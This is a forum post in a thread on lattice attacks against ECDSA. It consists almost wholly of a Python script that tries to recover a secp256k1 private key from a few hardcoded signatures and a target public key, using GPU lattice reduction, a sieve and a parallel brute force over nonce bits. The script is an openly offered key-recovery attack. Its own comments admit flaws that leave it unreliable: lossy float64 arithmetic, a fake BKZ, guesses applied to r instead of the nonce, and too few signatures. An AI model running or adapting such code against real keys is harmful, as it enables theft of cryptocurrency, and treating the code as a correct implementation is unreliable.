Post
Topic
Board Development & Technical Discussion
Re: Attacking ECDSA by Lattice Sieving: Bridging the Gap with Fourier Analysis Attacks
by
bisovskiy
on 19/10/2024, 16:05:06 UTC
import os
os.environ['CUDA_PATH'] = '/usr/local/cuda-11.5'

import logging
import multiprocessing
import pickle
import itertools

import cupy as cp
import numpy as np
from ecdsa.curves import SECP256k1

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

# Print CUDA version for verification
logger.info(f"CUDA version: {cp.cuda.runtime.runtimeGetVersion()}")
logger.info(f"CuPy version: {cp.__version__}")

# Definition of the SECP256k1 curve and the base point G
curve = SECP256k1.curve
G = SECP256k1.generator
n = SECP256k1.order

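# ECDSA -> HNP conversion. For a signature (r, s) on hash z, the nonce
# satisfies k = s^-1 * (z + r*sk) mod q. If the top l bits of k are known
# (here: guessed and XORed away upstream), then k < q/2^l, and subtracting
# w = q/2^(l+1) recentres it into [-w, w). Each signature then gives a
# hidden-number-problem sample (t, a) with |t*sk - a mod q| <= w. This is
# my reading of the paper's reduction; the sign convention for a is chosen
# so it matches the t*alpha - a tests in the predicates below.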
def ecdsa_to_hnp(signatures, l):
    logger.info(f"Converting {len(signatures)} ECDSA signatures to HNP instances")
    q = n
    w = q // (2**(l+1))
    samples = []
    for sig in signatures:
        r = int(sig['r'], 16)
        s = int(sig['s'], 16)
        z = int(sig['z'], 16)

        t = (r * pow(s, -1, q)) % q
        # k = s^-1 (z + r*sk) mod q, so t*sk - a == k - w (mod q) with this a;
        # after the top-bit guess, k - w lies in [-w, w).
        a = (w - z * pow(s, -1, q)) % q
       
        samples.append((t, a))
    logger.info(f"Conversion complete. Generated {len(samples)} HNP samples")
    return samples

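# Lattice embedding (Kannan-style) of the HNP samples: m rows of q*e_i, one
# row carrying the t_i scaled by the search-window parameter x, and one row
# carrying the a_i with an embedding constant tau ~ w/sqrt(3) in the corner.
# A sufficiently short lattice vector should expose the recentred nonces in
# its first m coordinates and (a function of) the secret in the last two.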
def construct_lattice(samples, x, l):
    logger.info(f"Constructing lattice with {len(samples)} samples, x={x}, l={l}")
    m = len(samples)
    q = int(n)
    w = q // (2**(l+1))

    # (m+2) x (m+2) embedding: the q-vectors, the t-row and the a-row each
    # get their own row, so no q-row is overwritten.
    B = np.zeros((m+2, m+2), dtype=object)
    for i in range(m):
        B[i, i] = q
    B[m, :m] = np.array([x * t for t, _ in samples], dtype=object)
    B[m, m] = x
    B[m+1, :m] = np.array([a for _, a in samples], dtype=object)
    B[m+1, m+1] = int((w * w // 3)**0.5)  # embedding constant tau ~ w/sqrt(3)
    logger.info(f"Lattice construction complete. Dimension: {B.shape[0]} x {B.shape[1]}")
    return B

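# LLL on the GPU (sketch). A textbook QR-based LLL: size-reduce basis vector
# k, test the Lovasz condition, swap and re-triangularize on failure. Caveat:
# float64 carries ~53 bits of mantissa, so 256-bit lattice entries are only
# handled approximately here; a serious run would use an exact/multiprecision
# reduction library such as fpylll instead.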
def gpu_lll(B, delta=0.99):
    logger.info(f"Starting GPU-accelerated LLL reduction on {B.shape[0]}x{B.shape[1]} matrix")
    B = cp.asarray(B, dtype=cp.float64)
    # Factor B^T so that column k of R corresponds to basis vector k (row k of B).
    Q, R = cp.linalg.qr(B.T)
    dim = B.shape[0]
    k = 1
    while k < dim:
        # Size reduction: make basis vector k nearly orthogonal to vectors j < k.
        for j in range(k-1, -1, -1):
            mu = cp.round(R[j, k] / R[j, j])
            if mu != 0:
                R[:j+1, k] -= mu * R[:j+1, j]
        # Lovasz condition; on failure, swap the two basis vectors and
        # re-triangularize (a row swap alone would break R's triangular form).
        if delta * R[k-1, k-1]**2 > R[k, k]**2 + R[k-1, k]**2:
            R[:, [k-1, k]] = R[:, [k, k-1]]
            Q, R = cp.linalg.qr(Q @ R)
            k = max(k-1, 1)
        else:
            k += 1
    logger.info("GPU-accelerated LLL reduction complete")
    return (Q @ R).T

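# "BKZ" via sliding LLL blocks. This is not a full BKZ (there is no SVP
# oracle enumerating each projected block); it just runs the LLL sketch
# above over overlapping block_size-sized submatrices as a cheap approximation.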
def gpu_bkz(B, block_size=20):
    logger.info(f"Starting GPU-accelerated BKZ reduction with block size {block_size}")
    B = cp.asarray(B, dtype=cp.float64)  # ensure the basis lives on the GPU
    dim = B.shape[0]
    for i in range(0, dim - block_size + 1):
        logger.debug(f"Processing block {i}/{dim - block_size}")
        block = B[i:i+block_size, i:i+block_size]
        B[i:i+block_size, i:i+block_size] = gpu_lll(block)
    logger.info("GPU-accelerated BKZ reduction complete")
    return B

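# Gauss sieve (simplified). Pairwise-reduction sieve in the style of
# Micciancio-Voulgaris: pop a vector, reduce it against the current list via
# v +/- w while that shortens it, and keep it if it ends up below the target
# norm. A full sieve would also push list vectors back onto the queue when v
# reduces them; that step is omitted here for simplicity.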
def gauss_sieve(B, target_norm, max_list_size=None):
    logger.info(f"Starting Gauss sieve with target norm {target_norm}")
    L = []  # list of pairwise-reduced short vectors
    S = []  # vectors that stayed above the target norm
    C = B.get().tolist()  # move the reduced basis off the GPU into a work queue

    while C:
        v = cp.array(C.pop(0))

        if not L:
            L.append(v)
            continue

        # Reduce v against the list until no list vector shortens it further.
        changed = True
        while changed:
            changed = False
            for w in L:
                if cp.linalg.norm(v - w) < cp.linalg.norm(v):
                    v = v - w
                    changed = True
                    break
                elif cp.linalg.norm(v + w) < cp.linalg.norm(v):
                    v = v + w
                    changed = True
                    break

        if cp.linalg.norm(v) == 0:
            continue  # v collapsed to the zero vector; discard it

        if cp.linalg.norm(v) <= target_norm:
            L.append(v)
            if max_list_size and len(L) > max_list_size:
                L.sort(key=lambda u: float(cp.linalg.norm(u)))
                L = L[:max_list_size]
        else:
            S.append(v)

    logger.info(f"Gauss sieve complete. Found {len(L)} vectors")
    return L

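# Interval reduction. Given a candidate interval [low, high] for the hidden
# value, each HNP sample (t, a) constrains t*alpha to lie within w of a
# modulo q, which slices the interval into at most a few subintervals;
# roughly log2(high - low + 1) samples should shrink the search space to a
# handful of candidates.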
def interval_reduction(low, high, samples, q, l):
    logger.info(f"Starting interval reduction: [{low}, {high}]")

    def cdiv(a, b):
        return -((-a) // b)  # ceiling division for (big) integers

    w = q // (2**(l+1))
    N = max(1, int(np.ceil(np.log2(float(high - low + 1)))))
    R = [(low, high)]

    for t, a in samples[:N]:
        R_new = []
        for lo, hi in R:
            n_min = cdiv(t * lo - a - w, q)
            n_max = (t * hi - a + w) // q
            for j in range(n_min, n_max + 1):
                new_low = max(lo, cdiv(a + j * q - w, t))
                new_high = min(hi, (a + j * q + w) // t)
                if new_low <= new_high:
                    R_new.append((new_low, new_high))
        R = R_new

    logger.info(f"Interval reduction complete. Resulting intervals: {len(R)}")
    return R

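# Pre-screening: a cheap all-samples consistency check for a candidate
# alpha0. Every recentred residual x*t*alpha0 - a must stay within the nonce
# bound w, plus a small slack term q/2^(l+4) (the slack follows my reading
# of the paper).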
def pre_screening(alpha0, samples, q, l, x):
    logger.debug(f"Pre-screening candidate α₀: {alpha0}")
    w = q // (2**(l+1))
    result = all(abs(((x * t * alpha0 - a + q//2) % q) - q//2) <= w + q//(2**(l+4)) for t, a in samples)
    logger.debug(f"Pre-screening result: {'Passed' if result else 'Failed'}")
    return result

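# Linear predicate: turns a short-vector candidate v = (v0, v1) into a key
# candidate. v0 should equal a recentred nonce and |v1| the embedding
# constant tau, from which alpha is solved linearly from the first sample;
# a majority vote over up to ~2*log2(q) further samples filters out false
# positives.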
def improved_linear_predicate(v, samples, q, l, tau):
    logger.debug(f"Checking improved linear predicate for v: {v}")
    v0, v1 = int(v[0]), int(v[1])
    if v0 == 0 or abs(v0) > q // (2**(l+1)) or abs(v1) != tau:
        logger.debug("Predicate failed initial checks")
        return None

    k0 = -int(np.sign(v1)) * v0 + q // (2**(l+1))
    alpha = ((samples[0][1] + k0) * pow(samples[0][0], -1, q)) % q

    N = 2 * q.bit_length()
    M = sum(1 for t, a in samples[:N]
            if abs(((t * alpha - a + q // 2) % q) - q // 2) < q // (2**l))

    if M > N * (1 - np.log2(float(q)) / (2**l) + 2**(-l)) / 2:
        logger.debug(f"Predicate passed. Potential α: {alpha}")
        return int(alpha)
    logger.debug("Predicate failed final check")
    return None

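# Decomposition predicate: like the linear predicate, but v0 only pins the
# hidden value down to a window of width x; interval reduction shrinks that
# window, and the surviving candidates are passed through the linear
# predicate and pre-screening.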
def decomposition_predicate(v, samples, q, l, tau, x):
    logger.debug(f"Checking decomposition predicate for v: {v}")
    v0, v1 = int(v[0]), int(v[1])
    if v0 == 0 or abs(v0) > q // (2**(l+1)) or abs(v1) != tau:
        logger.debug("Decomposition predicate failed initial checks")
        return None

    low = -int(np.sign(v1)) * v0 - x // 2
    high = -int(np.sign(v1)) * v0 + x // 2

    R = interval_reduction(low, high, samples, q, l)

    for interval in R:
        for h in range(interval[0], interval[1] + 1):
            alpha = improved_linear_predicate((h, -tau), samples, q, l, tau)
            if alpha is not None and pre_screening(alpha, samples, q, l, x):
                logger.info(f"Decomposition predicate found potential solution: {alpha}")
                return alpha

    logger.debug("Decomposition predicate failed to find a solution")
    return None

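# Progressive BKZ + sieve: reduce and sieve in growing dimension d, checking
# the predicate after each round so easy instances terminate before the full
# lattice is processed. The target norm sqrt(4/3) * det(B)^(1/d) is the
# usual Gaussian-heuristic estimate of the shortest vector length.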
def progressive_bkz_sieve(B, predicate, start_dim=20, step=5, max_dim=None):
    if max_dim is None:
        max_dim = B.shape[0]

    # Clamp the starting dimension so small lattices are still processed.
    for d in range(min(start_dim, max_dim), max_dim + 1, step):
        logger.info(f"Processing dimension {d}")
        # Convert the integer (object-dtype) sublattice to float64 on the GPU;
        # lossy for 256-bit entries, see the LLL caveat above.
        B_sub = cp.asarray(B[:d, :d].astype(np.float64))

        B_sub = gpu_bkz(B_sub, block_size=min(20, d))

        target_norm = (4/3)**0.5 * float(abs(cp.linalg.det(B_sub)))**(1/d)
        logger.info(f"Target norm for dimension {d}: {target_norm}")
        sieved_vectors = gauss_sieve(B_sub, target_norm, max_list_size=d*10)

        logger.info(f"Checking predicates for {len(sieved_vectors)} vectors")
        for v in sieved_vectors:
            sk = predicate(v[-2:])
            if sk is not None:
                logger.info(f"Found potential solution: {sk}")
                return sk

    logger.info("Progressive BKZ-sieve completed without finding a solution")
    return None


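# Per-pattern worker: XOR one guessed l-bit pattern into the top bits,
# rebuild the HNP samples and lattice, run the progressive reduction, and
# verify any candidate key against the known public key before accepting it.
# (XORing the guess into r is the approach taken in this thread; strictly,
# the guess concerns the nonce k, of which r is only an indirect function.)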
def try_nonce_patterns(args):
    signatures, l, x, pubkey, patterns = args
    logger.info(f"Trying nonce pattern: {patterns}")
    modified_sigs = [{**sig, 'r': hex(int(sig['r'], 16) ^ (pat << (256 - l)))[2:].zfill(64)}
                     for sig, pat in zip(signatures, patterns)]
    samples = ecdsa_to_hnp(modified_sigs, l)
    B = construct_lattice(samples, x, l)

    def predicate(v):
        # B is a NumPy object array; B[-1, -1] is the embedding constant tau.
        return decomposition_predicate(v, samples, int(n), l, int(B[-1, -1]), x)

    sk = progressive_bkz_sieve(B, predicate, start_dim=20)

    if sk:
        recovered_point = sk * G
        recovered_pubkey = ('04'
                            + hex(recovered_point.x())[2:].zfill(64)
                            + hex(recovered_point.y())[2:].zfill(64))
        if recovered_pubkey == pubkey:
            logger.info(f"Successfully recovered private key: {hex(sk)}")
            return sk
    logger.info(f"Failed to recover private key for pattern: {patterns}")
    return None

def save_progress(completed_patterns):
    logger.info(f"Saving progress. Completed patterns: {len(completed_patterns)}")
    with open("progress.pkl", "wb") as f:
        pickle.dump(completed_patterns, f)

def load_progress():
    if os.path.exists("progress.pkl"):
        with open("progress.pkl", "rb") as f:
            completed_patterns = pickle.load(f)
        logger.info(f"Loaded progress. Completed patterns: {len(completed_patterns)}")
        return completed_patterns
    logger.info("No previous progress found. Starting from scratch.")
    return set()

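# Driver. Demo inputs: three signatures and their message hashes. Note that
# with l = 7 guessed bits per nonce and only 3 signatures, at most ~21 bits
# of the 256-bit key are constrained; roughly 256/7 ~ 37 signatures would be
# needed for the lattice step to have a realistic chance, so the three below
# only exercise the pipeline.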
def main():
    signatures = [
        {
            'r': '1e8e175bd4fe465c4be9999840cc5bc50d8da9195d10e3350ebf388e429df874',
            's': 'dedd1a4422041d6d2a5c2dabba51d45b4bb9d233baed5cd4caf54e3d0a80d47e',
            'z': '941e563da856ee60678e59c7fdb71d3ed476c9322b3fcd4133dd677d07c82ff7',
        },
        {
            'r': '48939db78d89e510ce280efb8ec47c11af39bcd58d59b87b690a33b0322fd73e',
            's': '62eda7479b658e06bb83d0135d69553d838ca9f7bd63ed7294ed59e2bd37c492',
            'z': 'ce4b9ad74ce61b4ac087f2b0404d313f61d86eed00923806b0d83e9a4559140f',
        },
        {
            'r': '58347d292315a1c7a273b66d7bde268f2c8daad892bddcfe77df4891af48e4ea',
            's': 'c3bbcf5912b25738f7bd2379b57e40f290ca84ed87380c05326b49635f7ad1fc',
            'z': 'fd74693fed61ef0cd6b7bd7284057fe747ee29e39b663520b227e56f8ce1f9bc',
        }
    ]
   
    l = 7  # guess the top l = 7 bits of each nonce
    x = 2**15
    pubkey = "04f22b7f1e9990eeac8570517a567d46c1f173f6670244cca6184f59e350312129671e4f5a614e164d151a5836bab8684e24bfe247141b7e30251bb7290e275e69"
   
    all_patterns = list(itertools.product(range(2**l), repeat=len(signatures)))
    completed_patterns = load_progress()
    patterns_to_try = [p for p in all_patterns if p not in completed_patterns]
   
    num_processors = min(24, multiprocessing.cpu_count())
    logger.info(f"Using {num_processors} processors")

    try:
        with multiprocessing.Pool(num_processors) as pool:
            args = [(signatures, l, x, pubkey, pattern) for pattern in patterns_to_try]
            # imap (ordered) so that index i lines up with patterns_to_try[i].
            for i, result in enumerate(pool.imap(try_nonce_patterns, args)):
                if result is not None:
                    print(f"Successfully recovered private key: {hex(result)}")
                    return
                completed_patterns.add(patterns_to_try[i])
                if (i+1) % 1000 == 0:
                    save_progress(completed_patterns)
                    logger.info(f"Completed {i+1}/{len(patterns_to_try)} pattern combinations")
    except KeyboardInterrupt:
        logger.info("Interrupted by user. Saving progress...")
        save_progress(completed_patterns)
   
    print("Failed to recover the private key.")

if __name__ == "__main__":
    main()